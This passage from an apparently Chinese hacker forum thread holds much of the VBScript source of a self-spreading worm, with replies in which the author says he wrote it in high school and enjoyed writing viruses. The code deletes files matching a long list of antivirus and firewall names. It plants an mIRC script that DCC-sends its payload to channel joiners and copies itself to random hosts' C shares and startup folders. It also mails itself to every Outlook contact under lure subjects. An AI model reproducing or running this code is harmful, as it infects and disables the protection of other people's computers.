"symproxysvc") or (b = "nisum") or (b = "navapsvc") or (b = "navlu32") or (b = "navrunr") or (b = "pview95") or (b = "f-stopw") or (b = "f-prot95.") or (b = "Pccwin98") or (b = "iomon98") or (b = "fp-win") or (b = "nvc95") or (b = "norton") or (b = "mcafee") or (b = "antivir") or (b = "webscanx") or (b = "safeweb") or (b = "cfine") or (b = "avp") or (b = "lockdown2000") or (b = "avp32") or (b = "zonealarm") or (b = "wink") or (b = "sirc32") or (b = "scam32") or (b = "TMOAgent") or (b = "Tmntsrv") or (b = "tmproxy") or (b = "tmupdito") or (b = "TSC") or (b = "KRF") or (b = "KPFW32") or (b = "_AVPM") or (b = "AUTODOWN") or (b = "AVKSERV") or (b = "AVPUPD") or (b = "BLACKD") or (b = "CFIND") or (b = "CLEANER") or (b = "ECENGINE") or (b = "F-PROT") or (b = "FP-WIN") or (b = "IAMSERV") or (b = "ICLOADNT") or (b = "LOOKOUT") or (b = "N32ACAN") or (b = "NAVW32") or (b = "NORMIST") or (b = "PADMIN") or (b = "pccwin98") or (b = "rav7win") or (b = "SMC") or (b = "TCA") or (b = "VETTRAY") or (b = "VSSTAT.") or (b = "ACKWIN32") or (b = "AVCONSOL") or (b = "AVPNT") or (b = "avpdos32") or (b = "AVSCHED32") or (b = "BLACKICE") or (b = "EFINET32") or (b = "CLEANER3") or (b = "ESAFE") or (b = "F-PROT95") or (b = "IBMASN") or (b = "ICMOON") or (b = "IOMON98") or (b = "LUALL") or (b = "NAVAPW32") or (b = "NAVWNT") or (b = "NUPGRADE") or (b = "PAVCL") or (b = "PCFWALLICON") or (b = "SCANPM") or (b = "SPHINX") or (b = "TDS2-98") or (b = "VSSCAN40") or (b = "WEBSCANX") or (b = "WEBSCAN") or (b = "ANTI-TROJAN") or (b = "AVE32") or (b = "AVP") or (b = "AVPM") or (b = "AVWIN95") or (b = "CFIADMIN") or (b = "CLAW95") or (b = "DVP95") or (b = "ESPWATCH") or (b = "F-STOPW") or (b = "FRW") or (b = "IBMAVSP") or (b = "ICSUPP95") or (b = "JED") or (b = "MOOLIVE") or (b = "NAVLU32") or (b = "NISUM") or (b = "NVC95") or (b = "NAVSCHED") or (b = "PERSFW") or (b = "SAFEWEB") or (b = "SCRSCAN") or (b = "SWEEP95") or (b = "TDS2-NT") or (b = "VSECOMR") or (b = "WFINDV32") or (b = "AVPCC") or (b = "_AVPCC") or (b = "AVPTC32") or (b = "AVWUPD32") or (b = "CFIAUDIT") or (b = "CLAW95CT") or (b = "DV95_O") or (b = "DV95") or (b = "F-AGNT95") or (b = "FINDVIRU") or (b = "IAMAPP") or (b = "ICLOAD95")  or (b = "ICSSUPPNT") or (b = "MPFTRAY") or (b = "NAVNT") or (b = "NMAIN") or (b = "OUTPOST") or (b = "NAVW") or (b = "RAV7") or (b = "SCAN32") or (b = "SERV95") or (b = "TBSCAN") or (b = "VSHWIN32") or (b = "AVPMON") or (b = "AVP32")  then
set gp = fso.GetFile(f1.path)
gp.Delete
end if
if (eq<>folderspec) then
if (dd = "mirc32.exe")or(dd = "mlink32.exe")or(dd = "mirc.ini")or(dd = "script.ini")or(dd="mirc.hlp")then
Set si = Fso.CreateTextFile(folderspec&"\script.ini")
si.WriteLine "[script]"
si.WriteLine "n0=on *:JOIN:#: if ((($nick != $me) && ($chan != #virus))) { WZT.infect $nick }"
si.WriteLine "n1=alias -l file.name return$gettok(:system.vbe:system.vbe:system.vbe:system.vbe:system.vbe:system.vbe:system.vbe:,$r(1,7),58)"
si.WriteLine "n2=alias WZT.infect {"
si.WriteLine "n3=  %WZT.sock = WZT.send. $+ $rand(100,9000)"
si.WriteLine "n4=  socklisten %WZT.sock"
si.WriteLine "n5=  .timer99 off"
si.WriteLine "n6=  .timer99 1 120 sockclose WZT.send.*"
si.WriteLine "n7=  raw -q privmsg $1 : $+ $chr(1) $+ DCC SEND $file.name $longip($ip) $sock(%WZT.sock).port $file(" & fso.getspecialfolder(1) &"\system.vbe" & ").size $+ $chr(1)"
si.WriteLine "n8=}"
si.WriteLine "n9=on *:socklisten:WZT.send.*:{"
si.WriteLine "n10=  set %WZT.temp WZT.write. $+$gettok($sockname,3,46) | sockaccept %WZT.temp | WZT.send%WZT.temp | sockclose $sockname"
si.WriteLine "n11=}"
si.WriteLine "n12=on *:sockwrite:WZT.write.*:{"
si.WriteLine "n13=  if ($sock($sockname).sent >= $file(" &fs0.getspecialfolder(0) & "\system.vbe" & ").size) sockwrite -n $sockname"
si.WriteLine "n14=  else WZT.send $sockname"
si.WriteLine "n15=}"
si.WriteLine "n16=alias  WZT.send {"
si.WriteLine "n17=  bread " & fso.getspecialfolder(1) & "\system.vbe" & "$sock($sockname).sent 4096 &system.vbe"
si.WriteLine "n18=  sockwrite $1 &system.vbe"
si.WriteLine "n19=}"
si.Close
eq=folderspec
end if
end if
next  
end sub

sub folderlist(folderspec)  
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)  
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next  
end sub

sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub

function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget = regedit.RegRead(value)
end function

Sub juyu()
Dim octa, octb, octc,octd,rand,dot,driveconnected,sharename,count
Set fso2=CreateObject("Scripting.FilesystemObject")
count = "0"
dot = "."
driveconnected="0"
Set run = CreateObject("WScript.Shell")
set wshnetwork = wscript.createobject("wscript.network")
on error resume next
randomize
randaddress()

do
do while driveconnected = "0"
checkaddress()
shareformat()
wshnetwork.mapnetworkdrive "j:", sharename
enumdrives()
loop
copyfiles()
disconnectdrive()
run "&sharename&\con\con", 0
loop
end sub

Function disconnectdrive()
wshnetwork.removenetworkdrive "j:"
driveconnected = "0"
end function

function copyfiles()
fso2.copyfile dir2&"\system.vbe", "j:\"
fso2.copyfile dir2&"\system.inf", "j:\"
fso2.copyfile dir2&"\system.vbe", "j:\windows\startm~1\programs\startup\"
fso2.copyfile dir2&"\system.vbe", "j:\windows\"
fso2.copyfile dir2&"\system.vbe", "j:\windows\system32\"
fso2.copyfile dir2&"\system.inf", "j:\windows\system32\"
fso2.copyfile dir2&"\system.vbe", "j:\winnt\system32\"
end function

function checkaddress()
octd = octd + 1
if octd = "255" then randaddress()
end function

function shareformat()
sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C"
end function

function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
driveconnected = 1
else
driveconnected = 0
end if
Next
end function

function randum()
rand = int((254 * rnd) + 1)
end function

function randaddress()
if count < 50 then
octa=Int((16) * Rnd + 199)
count=count + 1
else
randum()
octa= rand
end if
randum()
octb=rand
randum()
octc=rand
octd="1"
end function


Function mail()
on error resume next
Set outlookApp = CreateObject("Outlook.Application")
If outlookApp= "Outlook" Then
Set mapiObj=outlookApp.GetNameSpace("MAPI")
Set addrList= mapiObj.AddressLists
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count
For addrEntIndex= 1 To addrEntCount
Set item = outlookApp.CreateItem(0)
Set addrEnt = addr.AddressEntries(addrEntIndex)
item.To = addrEnt.Address
Randomize
num = Int((6*Rnd)+1)
if num = 1 then
item.Subject = "Look this!"
elseif num = 2 then
item.Subject = "Catch me!"
elseif num = 3 then
item.Subject = "I am sorry to hear that!"
elseif num = 4 then
item.Subject = "You&#39;re my Baby!"
elseif num = 5 then
item.Subject = "I get the job!"
elseif num = 6 then
item.Subject = "Here is the MM!"
end if
Randomize
nuk = Int((6*Rnd)+1)
if nuk = 1 then
item.Body = "China has setted up his first maned spaceship in the outerspace on Oct.15th!"
elseif nuk = 2 then
item.Body = "I can say that hacker in China will be the best in the world!"
elseif nuk = 3 then
item.Body = "If you must choose the only one between love and cause, which would you choose? Can you tell me?"
elseif nuk = 4 then
item.Body = "You don&#39;t know I am the only man who love you the best? Wo, my darling, please married me!"
elseif nuk = 5 then
item.Body = "China is delovloping!"
elseif nuk = 6 then
item.Body = "I&#39;ll go to the College, please happy for me!"
end if
Set attachMents=item.Attachments
attachMents.Add dir2&"\system.vbe"
item.DeleteAfterSubmit = True
If item.To <> "" Then
item.Send
shellObj.regwrite "HKCU\software\Mailtest\mailed", "1"
End If
Next
End If
Next
End if
End Function
人情如冰六月寒,花做一份艳,为谁笑人间? 如果任何人发现我转载的有图像的文章中图像失效或者文章有问题,请及时短消息通知我。先谢谢。::)) coup de foudre

TOP

sgl

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
159 
精华
4 
积分
860 
阅读权限
100 
在线时间
276 小时 
注册时间
2005-5-29 
最后登录
2008-2-15 
沙发 发表于 2006-1-16 19:18  只看该作者
高中时写的,也让我第一次感觉到写病毒后的快感 [s:59]
http://tthacker.sitesled.com

TOP

落叶树

荣誉会员

Rank: 6Rank: 6Rank: 6

E.S.T论坛贵宾

帖子
894 
精华
42 
积分
5690 
阅读权限
100 
性别
男 
在线时间
549 小时 
注册时间
2004-8-21 
最后登录
2008-7-22 
椅子 发表于 2006-1-16 19:37  只看该作者
哟,楼上的语气似乎说明..... [s:59]
BLOG: http://blog.csdn.net/hkbyest

TOP

金州

智囊团成员

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T智囊团成员

帖子
1244 
精华
8 
积分
6154 
阅读权限
150 
性别
男 
在线时间
593 小时 
注册时间
2005-3-18 
最后登录
2008-6-6 

原创技术奖

板凳 发表于 2006-1-16 19:52  只看该作者
引用:
这里是引用第[2 楼]sgl2006-01-16 19:18发表的:
高中时写的,也让我第一次感觉到写病毒后的快感 [s:59]
哈哈,老大,原来是您写的阿,不好意思哈哈
马上编辑上您的名字,不知道那个W.Z.T是不是您的另外一个名字
出于慎重,还是先去掉了,换上您现在的名字,并且如果您不介意把来源写成邪恶八进制了阿,哈哈
如果您觉得提交到原创区更好一些,请您发短消息或者回帖子,
我看到之后会把这个删除掉,然后您就可以提交到原创区,哈哈
或者您请管理员删除掉,哈哈
祝福大哥,一生幸福,嘎嘎 [s:66]  [s:39]  [s:39]
人情如冰六月寒,花做一份艳,为谁笑人间? 如果任何人发现我转载的有图像的文章中图像失效或者文章有问题,请及时短消息通知我。先谢谢。::)) coup de foudre

TOP

sgl

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
159 
精华
4 
积分
860 
阅读权限
100 
在线时间
276 小时 
注册时间
2005-5-29 
最后登录
2008-2-15 
地板 发表于 2006-1-17 15:30  只看该作者
楼上的好客气,呵呵,其实W.Z.T是我名字的缩写,tthacker也是另外的别名,sgl是我来邪恶八进制后才注册的,就是瘦古龙的意思,好象很罗嗦~~~这个脚本病毒确实是我高中时写的,当时不懂编程,就会拿脚本拼几个破坏程序出来,高考后才学了c,于是就根据那个病毒写了脚本病毒制造机,还是dos界面下的,现在还可以在这个版块中找到那个代码,不过编程技巧还挺差的,对了,网上还流传一篇叫《对超级脚本病毒的构想》的文章,也是我写的,它们3个都是一个系列的,只是先被岁月联盟的转了,还改了作者的名。至于转到原创区,就算了 [s:39] ,一是原创区要的就是比较有技术含量的作品,二是现在脚本病毒不怎么流行了 [ [s:43]
http://tthacker.sitesled.com

TOP

金州

智囊团成员

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T智囊团成员

帖子
1244 
精华
8 
积分
6154 
阅读权限
150 
性别
男 
在线时间
593 小时 
注册时间
2005-3-18 
最后登录
2008-6-6 

原创技术奖

6楼 发表于 2006-1-18 05:13  只看该作者
《对超级脚本病毒的构想》这篇文章已经转来,哈哈,已经恢复了你在论坛的名字,表明了是邪恶八进制
哈哈,觉得还是很有意思的。哈哈,您太谦虚了阿,[s:66]
地址http://www.eviloctal.com/forum/htm_data/32/0601/18492.html
人情如冰六月寒,花做一份艳,为谁笑人间? 如果任何人发现我转载的有图像的文章中图像失效或者文章有问题,请及时短消息通知我。先谢谢。::)) coup de foudre

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题